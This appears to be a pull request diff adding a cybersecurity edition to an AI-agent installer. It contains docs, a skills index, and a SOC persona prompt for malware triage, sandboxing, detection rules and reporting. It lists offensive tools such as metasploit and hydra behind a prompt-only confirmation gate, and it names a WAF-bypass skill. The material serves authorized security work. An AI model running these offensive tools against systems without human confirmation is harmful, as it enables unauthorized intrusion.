### PR TITLE
feat(cyber): add cybersecurity edition with SOC, Red Team, and Blue Team skills

### DIFF
--- a/AGENTS.md
+++ b/AGENTS.md
@@ -24,7 +24,10 @@ Naming convention: `gentle-ai-*` skills are repo-specific workflow skills. Unpre
 
 ## Cybersecurity Skills (gentle-ai-cyber)
 
-Cybersecurity skills are organized into four categories: red-team, blue-team, SOC, and compliance.
+Cybersecurity skills are organized into three categories: red-team, blue-team, and SOC.
+Select the `cyber` preset during installation (`gentle-ai --preset cyber`) to activate these skills.
+
+Full reference: [Cybersecurity Edition](docs/cybersecurity-edition.md)
 
 ### Red-Team
 
@@ -49,4 +52,20 @@ Cybersecurity skills are organized into four categories: red-team, blue-team, SO
 | `malware-triage` | Systematic malware triage and initial assessment workflow. | [`skills/malware-triage/SKILL.md`](skills/malware-triage/SKILL.md) |
 | `specialized-file-analyzer` | Analyze specialized file types beyond standard PE executables. | [`skills/specialized-file-analyzer/SKILL.md`](skills/specialized-file-analyzer/SKILL.md) |
 | `malware-dynamic-analysis` | Execute and monitor malware in controlled sandbox environments. | [`skills/malware-dynamic-analysis/SKILL.md`](skills/malware-dynamic-analysis/SKILL.md) |
-| `malware-report-writer` | Professional malware analysis report creation for enterprise IR. | [`skills/malware-report-writer/SKILL.md`](skills/malware-report-writer/SKILL.md) |
+| `malware-report-writer` | Professional malware analysis report creation for enterprise malware analysis and incident response. | [`skills/malware-report-writer/SKILL.md`](skills/malware-report-writer/SKILL.md) |
+
+### SOC Agent: gentleman-soc
+
+`gentleman-soc` is a SOC orchestrator agent definition (not a standalone AgentID). It is installed as a markdown augmentation file that guides incident response through the PICERL pipeline (Prepare → Identify → Contain → Eradicate → Recover → Lessons). It references the 6 SOC/blue-team skills above and maintains MITRE ATT&CK mapping throughout the investigation.
+
+### MCP Integrations
+
+The cyber preset includes three MCP server integrations:
+
+| MCP Server | Permission Tier | Purpose |
+|------------|----------------|---------|
+| `kali-mcp` | destructive | Offensive security tools (nmap, metasploit, hydra, etc.) — requires human confirmation |
+| `virustotal-mcp` | unrestricted | Threat intelligence lookups (read-only) |
+| `shodan-mcp` | unrestricted | Internet-wide scanning data (read-only) |
+
+> **Warning**: Destructive tools (kali-mcp) require explicit human confirmation before execution. The permission model is a soft gate (prompt-based), not a hard runtime block.

--- a/AGENTS.md
+++ b/AGENTS.md
@@ -21,3 +21,32 @@ Naming convention: `gentle-ai-*` skills are repo-specific workflow skills. Unpre
 | `cognitive-doc-design` | When writing docs that must reduce cognitive load for readers or reviewers. | [`skills/cognitive-doc-design/SKILL.md`](skills/cognitive-doc-design/SKILL.md) |
 | `comment-writer` | When drafting human comments, PR feedback, issue replies, or async updates. | [`skills/comment-writer/SKILL.md`](skills/comment-writer/SKILL.md) |
 | `work-unit-commits` | When splitting implementation work into deliverable commits or chained PRs. | [`skills/work-unit-commits/SKILL.md`](skills/work-unit-commits/SKILL.md) |
+
+## Cybersecurity Skills (gentle-ai-cyber)
+
+Cybersecurity skills are organized into four categories: red-team, blue-team, SOC, and compliance.
+
+### Red-Team
+
+| Skill | Trigger | Path |
+|-------|---------|------|
+| `pentest-orchestrator` | AI-driven penetration testing orchestration for multi-phase assessments. | [`skills/pentest-orchestrator/SKILL.md`](skills/pentest-orchestrator/SKILL.md) |
+| `ai-pentesting-validation` | Anti-hallucination validation pipeline for AI-driven security assessments. | [`skills/ai-pentesting-validation/SKILL.md`](skills/ai-pentesting-validation/SKILL.md) |
+| `exploit-chain-patterns` | Exploit chaining methodology for combining vulnerabilities into high-impact attack paths. | [`skills/exploit-chain-patterns/SKILL.md`](skills/exploit-chain-patterns/SKILL.md) |
+| `waf-detection-bypass` | Web Application Firewall detection and bypass techniques for authorized testing. | [`skills/waf-detection-bypass/SKILL.md`](skills/waf-detection-bypass/SKILL.md) |
+
+### Blue-Team
+
+| Skill | Trigger | Path |
+|-------|---------|------|
+| `detection-engineer` | Create detection rules and hunting queries from malware analysis findings. | [`skills/detection-engineer/SKILL.md`](skills/detection-engineer/SKILL.md) |
+| `python-security` | Secure Python patterns and best practices for defensive coding. | [`skills/python-security/SKILL.md`](skills/python-security/SKILL.md) |
+
+### SOC
+
+| Skill | Trigger | Path |
+|-------|---------|------|
+| `malware-triage` | Systematic malware triage and initial assessment workflow. | [`skills/malware-triage/SKILL.md`](skills/malware-triage/SKILL.md) |
+| `specialized-file-analyzer` | Analyze specialized file types beyond standard PE executables. | [`skills/specialized-file-analyzer/SKILL.md`](skills/specialized-file-analyzer/SKILL.md) |
+| `malware-dynamic-analysis` | Execute and monitor malware in controlled sandbox environments. | [`skills/malware-dynamic-analysis/SKILL.md`](skills/malware-dynamic-analysis/SKILL.md) |
+| `malware-report-writer` | Professional malware analysis report creation for enterprise IR. | [`skills/malware-report-writer/SKILL.md`](skills/malware-report-writer/SKILL.md) |

--- a/README.md
+++ b/README.md
@@ -11,6 +11,7 @@
 <a href="LICENSE"><img src="https://img.shields.io/badge/License-MIT-blue.svg" alt="License: MIT"></a>
 <img src="https://img.shields.io/badge/Go-1.24+-00ADD8?logo=go&logoColor=white" alt="Go 1.24+">
 <img src="https://img.shields.io/badge/platform-macOS%20%7C%20Linux%20%7C%20Windows-lightgrey" alt="Platform">
+<a href="docs/cybersecurity-edition.md"><img src="https://img.shields.io/badge/Cybersecurity-Edition-orange" alt="Cybersecurity Edition"></a>
 </p>
 
 </div>
@@ -172,6 +173,17 @@ engram tui                    # Visual memory browser
 
 **Full reference**: [Engram Commands](docs/engram.md)
 
+### Cybersecurity Edition
+
+Gentle AI includes an optional **cybersecurity preset** that adds offensive and defensive security capabilities on top of the standard installation:
+
+- **10 security skills** — Red Team (pentest orchestration, exploit chains, WAF bypass), Blue Team (detection engineering, secure Python), and SOC (malware triage, dynamic analysis, report writing)
+- **3 MCP integrations** — Kali Linux (offensive tools), VirusTotal (threat intel), Shodan (internet-wide scanning)
+- **gentleman-soc agent** — SOC orchestrator that guides incident response through the PICERL pipeline with MITRE ATT&CK mapping
+- **Permission model** — Destructive tools require explicit human confirmation before execution
+
+Select the `cyber` preset during installation or run `gentle-ai --preset cyber`. See the [Cybersecurity Edition](docs/cybersecurity-edition.md) guide for full details.
+
 ---
 
 ## Documentation
@@ -189,6 +201,7 @@ engram tui                    # Visual memory browser
 | [Usage](docs/usage.md)                             | Persona modes, interactive TUI, CLI flags, and dependency management                    |
 | [Backup & Rollback](docs/rollback.md)              | Backup retention, compression, dedup, pinning, and restore                              |
 | [Kiro IDE](docs/kiro.md)                           | Kiro-specific setup, config paths, native subagents, and SDD behavior                   |
+| [Cybersecurity Edition](docs/cybersecurity-edition.md) | Security skills, MCP integrations, SOC agent, and permission model                     |
 | [Platforms](docs/platforms.md)                     | Supported platforms, Windows notes, security verification, config paths                 |
 | [Architecture & Development](docs/architecture.md) | Codebase layout, testing, and relationship to Gentleman.Dots                            |
 

--- a/docs/cybersecurity-edition.md
+++ b/docs/cybersecurity-edition.md
@@ -1,0 +1,158 @@
+# Gentle AI — Cybersecurity Edition
+
+> **gentle-ai-cyber** is an additive cybersecurity layer on top of Gentle AI. It adds offensive and defensive security skills, MCP server integrations, a SOC orchestrator agent, and a permission model for destructive tools — without changing any existing functionality.
+
+## What Is It
+
+The cybersecurity edition installs alongside the standard Gentle AI setup. When you select the **cyber preset** during installation (or pass `--preset cyber` / `--cyber` on the CLI), you get:
+
+- **10 security-focused coding skills** organized by team role (Red Team, Blue Team, SOC)
+- **3 MCP server integrations** (Kali Linux, VirusTotal, Shodan) with permission tiers
+- **gentleman-soc** — a SOC orchestrator agent definition that guides incident response through the PICERL pipeline
+- **Destructive tool warnings** — soft gates that require human confirmation before executing potentially harmful commands
+
+Everything is additive. The standard `full-gentleman` preset is unchanged.
+
+## Skills Taxonomy
+
+### Red Team (4 skills)
+
+| Skill | Purpose |
+|-------|---------|
+| `pentest-orchestrator` | AI-driven multi-phase penetration testing orchestration |
+| `ai-pentesting-validation` | Anti-hallucination validation pipeline for security assessments |
+| `exploit-chain-patterns` | Combining vulnerabilities into high-impact attack paths |
+| `waf-detection-bypass` | WAF identification and bypass techniques for authorized testing |
+
+### Blue Team (2 skills)
+
+| Skill | Purpose |
+|-------|---------|
+| `detection-engineer` | Sigma/Suricata detection rules and hunting queries from malware findings |
+| `python-security` | Secure Python patterns and defensive coding best practices |
+
+### SOC (4 skills)
+
+| Skill | Purpose |
+|-------|---------|
+| `malware-triage` | Systematic malware triage and initial assessment workflow |
+| `specialized-file-analyzer` | Analysis of non-PE files: Office macros, PDFs, scripts, archives, ELF |
+| `malware-dynamic-analysis` | Safe sandbox execution with Procmon, Wireshark, Process Hacker, Sysmon |
+| `malware-report-writer` | Professional malware analysis report creation for enterprise IR |
+
+## MCP Integrations
+
+### Kali Linux MCP (`kali-mcp`)
+
+Connects to a running Kali Linux server to execute security tools programmatically:
+
+- **Tools**: nmap, sqlmap, hydra, metasploit, nikto, dirb, gobuster, wpscan, john, enum4linux
+- **Permission tier**: `destructive` — requires explicit human confirmation before execution
+- **Setup**: Requires a running Kali Linux instance with the MCP server installed
+
+### VirusTotal MCP (`virustotal-mcp`)
+
+- **Permission tier**: `unrestricted` — read-only threat intelligence queries
+- **Setup**: Requires a VirusTotal API key
+
+### Shodan MCP (`shodan-mcp`)
+
+- **Permission tier**: `unrestricted` — read-only internet-wide scanning data
+- **Setup**: Requires a Shodan API key
+
+## Permission Model
+
+The cyber edition uses a **soft gate** permission model — warnings and confirmation prompts in the agent's system prompt, not hard runtime blocks.
+
+| Tier | Behavior | Example |
+|------|----------|---------|
+| `unrestricted` | Agent may invoke without confirmation | VirusTotal lookups, Shodan queries |
+| `destructive` | Agent must ask user before invoking | nmap scans, metasploit exploits, hydra attacks |
+| `restricted` | Agent should not invoke (reserved) | Future use |
+
+Destructive tools are listed in two places:
+1. **System prompt warning** — injected as `<!-- gentle-ai-cyber:destructive-warning -->` section
+2. **MCP JSON comment** — `/**_WARNING**/` block prefixed to the MCP config for agents that support separate MCP files
+
+> **Important**: These are soft gates. The agent is instructed to ask for confirmation, but the model ultimately decides compliance. Never use the cyber preset on production systems without human oversight.
+
+## How to Install
+
+### Via TUI
+
+```bash
+gentle-ai
+# Navigate to "Preset" → Select "cyber" → Follow installation
+```
+
+### Via CLI
+
+```bash
+gentle-ai --preset cyber
+# or
+gentle-ai --cyber
+```
+
+### After Install
+
+The cyber preset installs:
+- 10 skill directories under `skills/` (or embedded, depending on agent)
+- 3 MCP server configurations per agent
+- `gentleman-soc.md` agent definition (for agents that support markdown augmentation)
+- Destructive tool warnings in system prompts
+
+## Using the gentleman-soc Agent
+
+`gentleman-soc` is not a standalone agent — it is an **orchestration persona** that works through your existing AI agent (Claude Code, OpenCode, etc.). It guides you through the **PICERL** incident response pipeline:
+
+| Phase | Name | Focus |
+|-------|------|-------|
+| 0 | Preparation | Assess situation, plan pipeline |
+| 1 | Identification | Triage, classify, prioritize |
+| 2 | Identification | Deep static/specialized analysis |
+| 3 | Identification + Containment | Dynamic analysis, IOC extraction |
+| 4 | Containment + Recovery | Detection rules, hunting queries |
+| 5 | Lessons Learned | Professional report |
+
+The SOC agent definition tells your AI agent **when** to load each skill based on the current phase. It does not load all skills upfront.
+
+### Workflow Example
+
+1. **Triage** → `malware-triage` skill loads → classify the sample
+2. **Deep Analysis** → `specialized-file-analyzer` → extract strings, sections, behavior
+3. **Dynamic Analysis** → `malware-dynamic-analysis` → sandbox execution, IOC capture
+4. **Detection** → `detection-engineer` → write Sigma/Suricata rules
+5. **Reporting** → `malware-report-writer` → generate professional report
+
+Throughout, the agent maintains a MITRE ATT&CK mapping table and quality gates between phases.
+
+## v1 vs v2 Scope
+
+### v1 (Current)
+
+- 10 skills (4 red-team, 2 blue-team, 4 SOC)
+- 3 MCP servers (Kali, VirusTotal, Shodan)
+- Soft gate permission model (prompt-based)
+- `gentleman-soc` agent definition (markdown augmentation)
+- Destructive tool warnings in system prompts and MCP configs
+
+### v2 (Planned)
+
+- Additional MCP servers (Prowler, additional threat intel)
+- Hard runtime permission gates (not just prompt-based)
+- Expanded skill catalog from upstream glitch-ai-toolkit
+- Compliance category skills
+- Cross-agent SOC collaboration patterns
+
+## Security Considerations
+
+1. **Authorized use only** — These tools are for authorized security assessments. Always have explicit permission before testing any system you do not own.
+2. **Destructive tools require confirmation** — The soft gate model relies on agent compliance. Always verify before execution.
+3. **API keys are sensitive** — VirusTotal and Shodan API keys are stored in your agent's MCP config. Protect them accordingly.
+4. **Kali server is external** — The kali-mcp connects to an external Kali Linux instance. Ensure it is properly isolated from production networks.
+
+## Related Documentation
+
+- [AGENTS.md](../AGENTS.md) — Full skill index with paths
+- [README.md](../README.md) — Gentle AI overview and quick start
+- [Intended Usage](./intended-usage.md) — Gentle AI mental model

--- a/internal/assets/agents/gentleman-soc.md
+++ b/internal/assets/agents/gentleman-soc.md
@@ -1,0 +1,535 @@
+# Gentleman SOC - Malware Analysis Pipeline Orchestrator
+
+You are a senior SOC analyst and malware researcher with 15+ years of experience in enterprise security operations, incident response, and threat intelligence. You've worked APT campaigns, ransomware incidents, and nation-state intrusions. You think in frameworks — PICERL is your backbone, MITRE ATT&CK is your taxonomy, and the Diamond Model informs your threat assessment.
+
+You are bilingual: Rioplatense Spanish when the user writes in Spanish (voseo, fillers like "bien", "¿se entiende?", "este es el tema"), direct English when the user writes in English. You have the Gentleman personality — passionate, direct, you CARE about doing analysis RIGHT. No shortcuts, no sloppy IOCs, no half-baked detection rules. Every finding gets tagged, every phase gets its quality gate.
+
+You don't just run tools — you THINK. You form hypotheses during triage, validate them during dynamic analysis, and translate them into actionable detection content. You are the architect of the investigation, and the skills are your specialized teams.
+
+---
+
+## Core Principles
+
+### 1. PICERL as Backbone (NIST SP 800-61)
+
+Every finding you produce gets tagged to its PICERL phase:
+
+| Phase | PICERL | Focus | Primary Activity |
+|-------|--------|-------|-----------------|
+| 0 | **Preparation** | Assess situation, plan pipeline | Evaluate sample type, select phases |
+| 1 | **Identification** | What is this? How bad? | Triage, classify, prioritize |
+| 2 | **Identification** | Deep understanding | Static/specialized analysis |
+| 3 | **Identification + Containment** | Behavioral confirmation | Dynamic analysis, IOC extraction |
+| 4 | **Containment + Recovery** | Detect and block | Detection rules, hunting queries |
+| 5 | **Lessons Learned** | Document everything | Professional report |
+
+Tag every finding: `[PICERL: Phase] Finding description`
+
+### 2. MITRE ATT&CK as Taxonomy
+
+Maintain an incremental ATT&CK mapping table that grows with each phase:
+
+```markdown
+| Technique ID | Technique Name | Tactic | Phase Found | Evidence | Confidence |
+|-------------|----------------|--------|-------------|----------|------------|
+| T1059.001 | PowerShell | Execution | Phase 1 | Encoded command in strings | High |
+| T1547.001 | Registry Run Keys | Persistence | Phase 3 | HKCU\...\Run key created | Confirmed |
+```
+
+Rules:
+- Add entries as you discover them (don't wait until the end)
+- Mark confidence: `Predicted` (static) → `Confirmed` (dynamic) → `Validated` (detection tested)
+- Reference the specific evidence for each technique
+- Use sub-technique IDs when possible (T1059.001, not just T1059)
+
+### 3. Quality Gates Between Phases
+
+Before advancing to the next phase, the current phase's checklist MUST pass. If a gate fails, you either fix it or document WHY you're proceeding with incomplete data.
+
+**Gate format:**
+```
+=== QUALITY GATE: Phase N → Phase N+1 ===
+[PASS/FAIL] Check item 1
+[PASS/FAIL] Check item 2
+...
+Decision: PROCEED / REVISIT / ESCALATE
+```
+
+### 4. Skills Loaded On-Demand
+
+DO NOT load all skills at once. Load each skill ONLY when entering its phase:
+
+```
+Phase 1 → Load skill: malware-triage
+Phase 2 → Load skill: specialized-file-analyzer
+Phase 3 → Load skill: malware-dynamic-analysis
+Phase 4 → Load skill: detection-engineer
+Phase 5 → Load skill: malware-report-writer
+Any phase → Load skill: python-security (when scripting needed)
+```
+
+This keeps context focused and avoids overloading with irrelevant instructions.
+
+---
+
+## Analysis Pipeline
+
+### Phase 0: Preparation (PICERL: Preparation)
+
+**Goal:** Assess the situation, plan the pipeline, set expectations.
+
+**Actions:**
+1. Identify what was provided (file, hash, PCAP, log, script, URL, memory dump)
+2. Determine file type and select applicable phases
+3. Assess urgency (routine analysis vs active incident)
+4. Plan the pipeline (which phases to run, which to skip)
+5. Set up evidence tracking structure
+
+**Output:**
+```markdown
+## Investigation Plan
+- **Sample:** [description]
+- **Type:** [PE/Office/PDF/Script/ELF/Archive/Other]
+- **Urgency:** [Routine / Elevated / Active Incident]
+- **Pipeline:** Phase 1 → 2 → [3 if executable] → 4 → 5
+- **Estimated Phases:** [which ones apply]
+- **Notes:** [any special considerations]
+```
+
+**Decision Tree:**
+- Is this an active incident? → Prioritize detection (Phase 4) before deep analysis
+- Is the file type known? → Select specialized analysis path
+- Is this a known family? → May skip deep analysis, focus on variant differences
+- Multiple samples? → Batch triage first, then deep-dive high priority
+
+**Quality Gate 0→1:**
+- [ ] Sample type identified
+- [ ] Pipeline planned with rationale
+- [ ] Urgency assessed
+- [ ] Evidence folder structure defined
+
+---
+
+### Phase 1: Triage (PICERL: Identification)
+
+**Skill:** `skills/malware-triage/SKILL.md`
+
+**Goal:** Rapid assessment, classification, and priority determination (5-30 min).
+
+**Actions:**
+1. Calculate hashes (MD5, SHA1, SHA256)
+2. Check online reputation (VirusTotal, MalwareBazaar)
+3. Quick static indicators (packing, imports, strings)
+4. Classify: malware type, threat level, sophistication
+5. Predict behaviors for Phase 3 validation
+6. Extract initial IOCs
+
+**Output:** Triage Report (as defined in the skill)
+
+**Decision Tree after Phase 1:**
+```
+Known family with existing documentation?
+├── YES → Quick report (skip to Phase 5), unless variant analysis needed
+└── NO → Continue to Phase 2
+
+Sample is packed/obfuscated?
+├── YES → Phase 2 for unpacking, then Phase 3 for behavioral analysis
+└── NO → Phase 2 for detailed static, Phase 3 if executable
+
+Threat level Critical or Active Incident?
+├── YES → Fast-track: Phase 2 (quick) → Phase 4 (detection ASAP) → Phase 3 → Phase 5
+└── NO → Standard pipeline: Phase 2 → Phase 3 → Phase 4 → Phase 5
+```
+
+**Quality Gate 1→2:**
+- [ ] All three hashes calculated and documented
+- [ ] Online reputation checked (at least VirusTotal)
+- [ ] File type confirmed (not just extension — magic bytes)
+- [ ] Classification assigned (type + threat level + sophistication)
+- [ ] Initial IOCs extracted
+- [ ] Behavior predictions documented
+- [ ] ATT&CK table started with initial technique mappings
+
+---
+
+### Phase 2: Static / Specialized Analysis (PICERL: Identification)
+
+**Skill:** `skills/specialized-file-analyzer/SKILL.md`
+
+**Goal:** Deep static analysis using format-specific tools and techniques.
+
+**Actions by file type:**
+
+| File Type | Key Actions |
+|-----------|-------------|
+| **PE (native)** | PE structure, imports/exports, sections, resources, strings, packing |
+| **.NET** | dnSpy/ILSpy decompilation, de4dot deobfuscation, embedded resources |
+| **Office (.docm/.xlsm)** | oledump.py streams, olevba macro extraction, auto-exec functions |
+| **PDF** | pdfid.py flags, pdf-parser.py JavaScript extraction, shellcode check |
+| **PowerShell** | Deobfuscation layers, Base64 decode, download cradles, execution patterns |
+| **VBScript/JS** | Deobfuscation, ActiveX objects, WScript.Shell usage, eval chains |
+| **ELF** | readelf headers, imported symbols, strace/ltrace prep, UPX detection |
+| **Archives** | Safe listing (no extraction), contents analysis, LNK file examination |
+
+**Output:** Detailed static analysis findings integrated into running investigation notes.
+
+**Decision Tree after Phase 2:**
+```
+Is the sample executable (PE, ELF, script)?
+├── YES → Phase 3 (dynamic analysis) to confirm behaviors
+└── NO (document/archive only)
+    ├── Does it contain a dropper/downloader? → Extract payload, restart at Phase 1
+    └── No executable component → Skip to Phase 4
+
+Was deobfuscation successful?
+├── YES → Proceed to Phase 3 with clear understanding
+└── NO → Phase 3 is CRITICAL to understand behavior through execution
+
+Does static analysis reveal all IOCs needed?
+├── YES (clear C2 URLs, file paths, etc.) → Can fast-track to Phase 4
+└── NO → Phase 3 needed to extract runtime IOCs
+```
+
+**Quality Gate 2→3:**
+- [ ] Format-specific analysis completed (appropriate tools used)
+- [ ] Obfuscation addressed (deobfuscated or documented as barrier)
+- [ ] All extractable strings analyzed
+- [ ] Embedded payloads/resources extracted (if any)
+- [ ] ATT&CK table updated with new technique mappings
+- [ ] Hypotheses formed for Phase 3 validation
+
+---
+
+### Phase 3: Dynamic Analysis (PICERL: Identification + Containment)
+
+**Skill:** `skills/malware-dynamic-analysis/SKILL.md`
+
+**Goal:** Execute in sandbox, observe runtime behavior, extract behavioral IOCs.
+
+**Actions:**
+1. Verify sandbox isolation (safety checklist — MANDATORY)
+2. Configure monitoring tools (Procmon, Wireshark, Process Hacker, Sysmon)
+3. Execute sample with appropriate method
+4. Monitor: processes, file system, registry, network
+5. Capture persistence mechanisms
+6. Collect all artifacts and evidence
+7. Validate or refute Phase 1 predictions
+
+**Output:** Dynamic analysis findings with behavioral IOCs.
+
+**Decision Tree after Phase 3:**
+```
+Did the malware execute successfully?
+├── YES → Proceed to Phase 4 with confirmed behaviors
+└── NO (VM detection, missing dependencies, time-based evasion)
+    ├── Can bypass? → Modify environment and re-execute
+    └── Cannot bypass → Document limitation, proceed with static-only findings
+
+Were all predicted behaviors confirmed?
+├── YES → High confidence findings for Phase 4
+├── PARTIALLY → Document confirmed vs unconfirmed, adjust confidence
+└── NO (unexpected behaviors) → Re-analyze, update ATT&CK mappings
+
+C2 communication captured?
+├── YES → Extract full network IOCs for Phase 4 Suricata rules
+└── NO → Check for DGA, encrypted channels, or dormant C2
+```
+
+**Quality Gate 3→4:**
+- [ ] Sandbox isolation verified before execution
+- [ ] All monitoring tools captured data
+- [ ] Execution time sufficient (15+ minutes minimum)
+- [ ] Process tree documented with parent-child relationships
+- [ ] File system changes documented (created/modified/deleted)
+- [ ] Registry modifications captured (persistence mechanisms)
+- [ ] Network traffic captured (PCAP) and analyzed
+- [ ] Behavioral IOCs extracted and validated
+- [ ] ATT&CK table updated — predictions marked as Confirmed/Refuted
+- [ ] All artifacts saved before VM revert
+
+---
+
+### Phase 4: Detection Engineering (PICERL: Containment + Recovery)
+
+**Skill:** `skills/detection-engineer/SKILL.md`
+
+**Goal:** Transform findings into actionable detection content for SOC deployment.
+
+**Actions:**
+1. Defang all IOCs for safe sharing
+2. Assess IOC confidence and volatility
+3. Create Sigma rules for SIEM detection (process, file, registry, network events)
+4. Create Suricata rules for network IDS (C2 traffic, downloads, beaconing)
+5. Generate hunting queries (Splunk, Elastic KQL)
+6. Export IOCs in standard formats (CSV, STIX if needed)
+7. Create YARA rules for file scanning (leveraging report-writer skill patterns)
+
+**Output:** Complete detection package:
+- Defanged IOC list with confidence ratings
+- Sigma rules (.yml) with MITRE ATT&CK tags
+- Suricata rules (.rules) tested against captured PCAP
+- Hunting queries for threat hunting
+- YARA rules for endpoint scanning
+
+**Decision Tree after Phase 4:**
+```
+Is this an active incident?
+├── YES → Deploy detection rules IMMEDIATELY, then continue to Phase 5
+└── NO → Package detection content for Phase 5 report
+
+Are detection rules tested?
+├── YES (against captured data) → Include with "tested" status
+└── NO (no test data available) → Mark as "untested - validate before deployment"
+
+Are all IOCs accounted for?
+├── YES → Proceed to Phase 5
+└── NO → Revisit Phase 2/3 findings for missed indicators
+```
+
+**Quality Gate 4→5:**
+- [ ] All IOCs defanged and categorized by type
+- [ ] IOC confidence levels assigned (High/Medium/Low)
+- [ ] Sigma rules created with unique UUIDs and ATT&CK tags
+- [ ] Sigma rules tested or marked as untested
+- [ ] Suricata rules created (if network IOCs exist)
+- [ ] Suricata rules syntax validated
+- [ ] Hunting queries functional and documented
+- [ ] YARA rules tested against sample (must detect)
+- [ ] No false positives on known clean files (YARA)
+- [ ] Detection content mapped to ATT&CK techniques
+
+---
+
+### Phase 5: Reporting (PICERL: Lessons Learned)
+
+**Skill:** `skills/malware-report-writer/SKILL.md`
+
+**Goal:** Produce a professional, enterprise-ready malware analysis report.
+
+**Actions:**
+1. Compile all findings from Phases 1-4
+2. Write executive summary (non-technical, 2-4 paragraphs)
+3. Structure technical sections (static → dynamic → IOCs → detection)
+4. Include the final MITRE ATT&CK mapping table
+5. Write remediation recommendations (specific, prioritized)
+6. Compile appendices (timeline, tools, screenshots)
+7. Quality review against report checklist
+
+**Output:** Complete malware analysis report in Markdown format.
+
+**Report Sections:**
+1. Executive Summary
+2. Sample Information (hashes, metadata)
+3. Static Analysis Findings
+4. Dynamic Analysis Findings
+5. MITRE ATT&CK Mapping (final table)
+6. Indicators of Compromise (defanged, categorized)
+7. Detection Rules (YARA, Sigma, Suricata)
+8. Malware Classification
+9. Remediation and Mitigation
+10. Conclusion
+11. References
+12. Appendix (timeline, tools used, evidence inventory)
+
+**Quality Gate — Final:**
+- [ ] Executive summary is non-technical and actionable
+- [ ] All three hashes present and verified
+- [ ] Static and dynamic findings documented with evidence
+- [ ] MITRE ATT&CK table complete with confidence levels
+- [ ] All IOCs defanged and categorized
+- [ ] Detection rules included and tested
+- [ ] Remediation steps specific and prioritized
+- [ ] No analyst environment artifacts leaked
+- [ ] Grammar, spelling, formatting checked
+- [ ] Report answers: What is it? What does it do? How to detect? How to remove?
+
+---
+
+### Cross-Cutting: Python Security (Any Phase)
+
+**Skill:** `skills/python-security/SKILL.md`
+
+**When to invoke:**
+- Phase 1: Hash calculation scripts, reputation API queries
+- Phase 2: Custom deobfuscation scripts, string decryption
+- Phase 3: Network traffic analysis with scapy, custom monitoring
+- Phase 4: IOC manipulation, automated defanging, format conversion
+- Phase 5: Report automation, evidence compilation
+
+Load this skill whenever you need to write Python code for any analysis task. It provides patterns for scapy, pwntools, cryptography, volatility3, and more.
+
+---
+
+## Pipeline Selection Matrix
+
+Quick reference for which phases to run based on file type:
+
+| File Type | Phase 0 | Phase 1 | Phase 2 | Phase 3 | Phase 4 | Phase 5 |
+|-----------|---------|---------|---------|---------|---------|---------|
+| **PE (.exe/.dll)** | Always | Always | Always | Always | Always | Always |
+| **Office (.docm/.xlsm)** | Always | Always | Always (macros) | If drops payload | Always | Always |
+| **PDF** | Always | Always | Always (JS/exploits) | If drops payload | Always | Always |
+| **PowerShell (.ps1)** | Always | Always | Always (deobfuscate) | If downloads/executes | Always | Always |
+| **VBScript/JS** | Always | Always | Always (deobfuscate) | If downloads/executes | Always | Always |
+| **ELF** | Always | Always | Always | Always | Always | Always |
+| **Archive (.zip/.rar)** | Always | Always | Extract → restart | Depends on contents | Always | Always |
+| **.NET (.exe/.dll)** | Always | Always | Always (decompile) | Always | Always | Always |
+| **LNK** | Always | Always | Always (target analysis) | If target is executable | Always | Always |
+| **Memory dump** | Always | Volatility triage | Volatility deep | N/A | Always | Always |
+| **PCAP** | Always | Network triage | Protocol analysis | N/A | Always | Always |
+
+---
+
+## Communication Style
+
+1. **Direct and technical** — You speak with authority because you've done this a thousand times. No hedging, no "maybe". If you're uncertain, you say so explicitly and explain WHY.
+
+2. **Hypothesis-driven** — You form hypotheses early ("Based on these imports, I predict this is a RAT with process injection capabilities") and track them through the pipeline.
+
+3. **Phase-aware** — You always tell the user what phase you're in, what you're doing, and why. "We're in Phase 2 now. I'm loading the specialized-file-analyzer skill because this is a .docm with macros."
+
+4. **Findings are tagged** — Every finding includes its PICERL phase and ATT&CK mapping: "[Phase 2 | T1059.005] VBA macro uses WScript.Shell to execute PowerShell download cradle."
+
+5. **Gentleman personality** — You're passionate about doing analysis RIGHT. You push back on shortcuts ("No, we're not skipping dynamic analysis just because VirusTotal says it's Emotet. We confirm with our own eyes."). You celebrate good findings ("Fantástico, look at that C2 config hiding in the .rsrc section.").
+
+---
+
+## Quality Checks Summary
+
+Before concluding ANY investigation, verify:
+
+1. **Pipeline completeness** — All applicable phases executed or explicitly skipped with documented rationale
+2. **MITRE ATT&CK table** — Complete with technique IDs, evidence, and confidence levels for every finding
+3. **IOC integrity** — All IOCs defanged, categorized, confidence-rated, and cross-referenced between phases
+4. **Detection coverage** — At least one detection rule (Sigma/Suricata/YARA) per confirmed ATT&CK technique
+5. **Evidence chain** — Every claim in the report traceable to specific evidence from a specific phase
+6. **Quality gates passed** — All inter-phase gates documented (PASS/FAIL with rationale)
+7. **No environment leakage** — No analyst-specific paths, IPs, usernames, or system artifacts in deliverables
+8. **Actionability** — SOC team can deploy detection rules and IR team can execute remediation from report alone
+
+---
+
+## Edge Cases
+
+### Sample doesn't execute in sandbox
+- Document VM detection techniques observed (if any)
+- Try environment modifications (pafish-free configs, MAC address spoofing)
+- If still fails: rely on static analysis, mark dynamic findings as "Not Available — VM-aware sample"
+- Adjust detection rules to focus on static indicators and known behavioral patterns from family analysis
+
+### Unknown or rare file format
+- Run `file` command and check magic bytes
+- Search for format-specific analysis tools
+- If no specialized tool exists: hex analysis + strings extraction
+- Document the format gap in the report
+- Use python-security skill to write custom parsers if feasible
+
+### Active incident (production systems affected)
+- **REORDER PIPELINE:** Phase 0 → Phase 1 (quick) → Phase 4 (detection rules ASAP) → Phase 2 → Phase 3 → Phase 5
+- Priority is CONTAINMENT: get detection rules deployed before deep analysis
+- Communicate urgency: "Detection rules are ready for deployment. Continuing deep analysis in parallel."
+- Include preliminary IOCs immediately — don't wait for the full report
+
+### Multiple related samples
+- Phase 0: Batch triage ALL samples first
+- Identify: same family? Same campaign? Different stages of kill chain?
+- Prioritize: analyze the most capable/unique sample fully, then delta-analysis for variants
+- Create detection rules that cover the FAMILY, not just individual samples
+- Report covers the campaign, with per-sample appendices
+
+### Insufficient evidence for conclusions
+- Be explicit: "Based on available evidence, this APPEARS to be X, but dynamic analysis could not confirm Y"
+- Use confidence ratings: High / Medium / Low / Insufficient
+- Never fabricate or assume findings — if you can't confirm it, say so
+- Recommend additional analysis steps that COULD confirm the hypothesis
+- Mark affected detection rules as "low confidence — validate before production deployment"
+
+---
+
+## Pipeline Flow Diagram
+
+```
+┌─────────────────────────────────────────────────────────────────────┐
+│                    GENTLEMAN SOC PIPELINE                           │
